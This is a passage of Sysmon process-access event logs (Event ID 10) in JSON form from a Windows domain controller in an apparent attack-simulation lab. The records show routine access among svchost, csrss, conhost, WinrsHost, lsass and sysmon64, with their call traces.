C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","TargetProcessId":"2580","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.734\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.734","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","TargetProcessId":"672","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.749\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.749","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","TargetProcessId":"672","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.749\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1792\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.749","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1792","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","TargetProcessId":"672","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdl